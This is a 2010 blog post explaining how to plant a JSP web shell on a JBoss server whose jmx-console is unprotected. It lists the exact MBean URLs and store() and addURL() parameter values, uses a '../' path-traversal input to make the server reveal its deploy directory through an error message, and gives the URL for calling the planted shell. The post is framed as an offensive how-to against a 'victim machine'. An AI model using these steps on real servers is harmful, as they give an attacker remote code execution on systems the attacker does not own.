Friday, June 25, 2010

The curious case of JBoss Hacking

Hi everyone.

Today I'd like to talk about the Hacking of Jboss.

There are lots of resources on the net about it but maybe reading this article will hopefully help you when you come to a dead end because the configuration is not so standard.

The prerequisite is that you have access to the jmx-console as admin.
It is not so rare seeing jboss where the jmx-console is not password protected.

Well now what...

You would like to shovel your nice shell by using the addURL() function in the DeploymentScanner, but suddenly you think wtf ....the victim machine cannot connect to my web server on any port (no reverse, only bind allowed)

There is a workaround as described in this very detailed and nice paper:

http://www.redteam-pentesting.de/publications/jboss (Read it before going further on)

The technique described is about using another jboss class called: DeploymentFileRepository
at:


http://host:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.admin%3Aservice%3DDeploymentFileRepository


and its very useful store() function.
but sometimes thing go wrong anyway when you realize that after posting your jsp code, it doesn't get deployed by Jboss.
This is due to the fact that path where your, say shell.war, dir resides is not in the list of the deploymentscanner url and so the hot deployment fails
The solution is to verify where is your directory by inducing the server to an error:

Function description:

void store()

MBean Operation.
Param ParamType ParamValue ParamDescription
p1 java.lang.String (no description)
p2 java.lang.String (no description)
p3 java.lang.String (no description)
p4 java.lang.String (no description)
p5 boolean True False (no description)

Expected values:
p1 = shell.war (your dir name)
p2 = shell (name of the jsp file containing the code)
p3 = .jsp (extension)
p4 = (jsp code)
p5 = true

Error inducing values:
p1 = ../shell.war
p2 = shell
p3 = .jsp
p4 =
p5 = true

Next check the following line:

java.lang.IllegalArgumentException: child '../helpme.war' should be a child of parent '/prd/jboss/bws/web/bws106/./deploy/management'
org.jboss.console.manager.DeploymentFileRepository.getFile(DeploymentFileRepository.java:151)

The path '/prd/jboss/bws/web/bws106/deploy/management' is where your shell.war is residing.
Now that we know it, we have only to use the addURL() function of the deploymentscanner class.

So head to:
http://host:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL

Function description:

void addURL()

MBean Operation.
Param ParamType ParamValue ParamDescription
p1 java.lang.String (no description)


The url to input in the form relative to addURL() function is:
file:/prd/jboss/bws/web/bws106/deploy/management/

Note the trailing slash.

Now call your shell by loading the following url:

http://host:8080/shell/shell.jsp

Bye for now...